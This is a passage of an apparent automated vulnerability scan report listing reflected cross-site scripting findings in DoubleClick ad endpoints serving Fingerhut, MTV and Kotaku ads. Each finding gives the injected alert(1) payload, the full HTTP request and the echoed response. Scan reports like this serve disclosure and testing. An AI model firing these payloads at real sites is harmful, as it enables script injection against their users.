User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4872
Date: Mon, 13 Jun 2011 11:02:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<!-
...[SNIP]...
gif = 'http://s0.2mdn.net/1887566/reva728x90_grillz.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607dca70'-alert(1)-'050bea894a2&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dgrillz%26CTMedia%3Dx1%26CTProgT
...[SNIP]...

4.22. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pm parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 872f3'-alert(1)-'247dc5ea998 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787872f3'-alert(1)-'247dc5ea998&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4847
Date: Mon, 13 Jun 2011 11:03:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<!-
...[SNIP]...
creativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787872f3'-alert(1)-'247dc5ea998&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3Ddefault%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%26cm_mmc%3Dx
...[SNIP]...

4.23. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30b70'-alert(1)-'a0c0bb2c16a was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=1812386530b70'-alert(1)-'a0c0bb2c16a&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4886
Date: Mon, 13 Jun 2011 11:03:45 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<!-
...[SNIP]...
= '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=1812386530b70'-alert(1)-'a0c0bb2c16a&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dhairyguy%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%26cm_mmc%3Dx1-_-mplu
...[SNIP]...

4.24. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a3c1'-alert(1)-'7bf6f774d59 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=06a3c1'-alert(1)-'7bf6f774d59&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4896
Date: Mon, 13 Jun 2011 11:03:16 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<!-
...[SNIP]...
al_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=06a3c1'-alert(1)-'7bf6f774d59&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dfrugalmonster%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%
...[SNIP]...

4.25. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 141ca'-alert(1)-'5ead3770817 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=141ca'-alert(1)-'5ead3770817 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4675
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:03:47 GMT
Expires: Mon, 13 Jun 2011 11:03:47 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<!-
...[SNIP]...
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=141ca'-alert(1)-'5ead3770817http://www.fingerhut.com/user/pre_screen_credit.jsp?CTid=471&CTKey=default&CTMedia=x1&CTProgType=mass&CTUnitSize=728x90&CTTestGrp=flash&cm_mmc=x1-_-mass-_-728x90-_-flash';
var target = '_blank';
var dc
...[SNIP]...

4.26. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d082a'-alert(1)-'eead87a656a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86d082a'-alert(1)-'eead87a656a&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4847
Date: Mon, 13 Jun 2011 11:02:24 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>

<!-
...[SNIP]...
'';
var dcgif = 'http://s0.2mdn.net/1887566/728x90_aHairyGuy.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86d082a'-alert(1)-'eead87a656a&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3Ddefault%26CTMedia%3Dx1%2
...[SNIP]...

4.27. http://ad.doubleclick.net/adj/cm.mtv/ent_010111 [net parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/adj/cm.mtv/ent_010111

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e1c4'%3bfe92e006168 was submitted in the net parameter. This input was echoed as 8e1c4';fe92e006168 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /adj/cm.mtv/ent_010111;net=8e1c4'%3bfe92e006168 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 339
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:24:12 GMT
Expires: Mon, 13 Jun 2011 11:24:12 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/x;234516816;0-0;0;58298669;255-0/0;41773615/41791402/1;;~okv=;net=8e1c4';fe92e006168;~aopt=2/0/e3/0;~sscs=%3fhttp://fightglobalwarming.com">
...[SNIP]...

4.28. http://ad.doubleclick.net/adj/gm.kotaku/e3 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/gm.kotaku/e3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 121ba'%3balert(1)//4948de38c85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 121ba';alert(1)//4948de38c85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/gm.kotaku/e3;ptile=1;sz=82x50;ord=99858991;mtfIFPath=/assets/vendor/doubleclick/?&121ba'%3balert(1)//4948de38c85=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 403
Date: Mon, 13 Jun 2011 11:23:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/q;242186853;0-0;0;35427945;8058-82/50;42527333/42545120/1;;~okv=;ptile=1;sz=82x50;mtfIFPath=/assets/vendor/doubleclick/?&121ba';alert(1)//4948de38c85=1;~aopt=2/0/23/0;~sscs=%3fhttp://kotaku.com/e32011">
...[SNIP]...

4.29. http://ad.doubleclick.net/adj/gm.kotaku/e3 [ptile parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/gm.kotaku/e3

Issue detail

The value of the ptile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7570e'%3balert(1)//79459fa1de4 was submitted in the ptile parameter. This input was echoed as 7570e';alert(1)//79459fa1de4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/gm.kotaku/e3;ptile=7570e'%3balert(1)//79459fa1de4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 351
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:23:24 GMT
Expires: Mon, 13 Jun 2011 11:23:24 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/q;242186853;0-0;0;35427945;8058-82/50;42527333/42545120/1;;~okv=;ptile=7570e';alert(1)//79459fa1de4;~aopt=2/0/23/0;~sscs=%3fhttp://kotaku.com/e32011">
...[SNIP]...

4.30. http://ad.doubleclick.net/adj/gm.kotaku/pax [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/gm.kotaku/pax

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8663'%3balert(1)//2544952d3f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8663';alert(1)//2544952d3f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/gm.kotaku/pax;ptile=2;sz=82x50;ord=15641756;mtfIFPath=/assets/vendor/doubleclick/?&e8663'%3balert(1)//2544952d3f4=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 353
Date: Mon, 13 Jun 2011 11:23:42 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/b;44306;0-0;0;46577859;8058-82/50;0/0/0;;~okv=;ptile=2;sz=82x50;mtfIFPath=/assets/vendor/doubleclick/?&e8663';alert(1)//2544952d3f4=1;~aopt=2/0/23/0;~sscs=%3f">
...[SNIP]...

4.31. http://ad.doubleclick.net/adj/gm.kotaku/pax [ptile parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/gm.kotaku/pax

Issue detail

The value of the ptile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccf35'%3balert(1)//9bde8de0ddd was submitted in the ptile parameter. This input was echoed as ccf35';alert(1)//9bde8de0ddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/gm.kotaku/pax;ptile=ccf35'%3balert(1)//9bde8de0ddd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 301
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:23:39 GMT
Expires: Mon, 13 Jun 2011 11:23:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/b;44306;0-0;0;46577859;8058-82/50;0/0/0;;~okv=;ptile=ccf35';alert(1)//9bde8de0ddd;~aopt=2/0/23/0;~sscs=%3f"><
...[SNIP]...

4.32. http://ad.doubleclick.net/adj/gm.kotaku/pc [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/gm.kotaku/pc

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e201'-alert(1)-'d992d7999dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/gm.kotaku/pc;ptile=9;sz=300x250;ord=45018742;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku?&9e201'-alert(1)-'d992d7999dd=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D9%3Bsz%3D300x250%3Bord%3D45018742%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=45018732&nocache=true
